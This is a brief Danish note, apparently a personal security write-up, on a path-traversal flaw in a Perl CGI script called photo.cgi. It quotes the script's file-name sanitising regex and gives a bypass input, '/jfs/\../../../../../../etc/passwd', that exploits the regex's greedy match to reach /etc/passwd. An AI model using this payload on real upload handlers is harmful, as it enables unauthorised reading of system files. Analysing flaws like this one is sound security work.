Exploit af photo.cgi - 2 - JA

$filename =lc($UPLOAD{'FILE_NAME'});
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
../../../../../../etc/passwd dur ikke pga regexp.
(Han tror \1 = \001)
/jfs/\../../../../../../etc/passwd dur da regexp .+ laver match first så længe alt matches

$filename =lc($UPLOAD{'FILE_NAME'});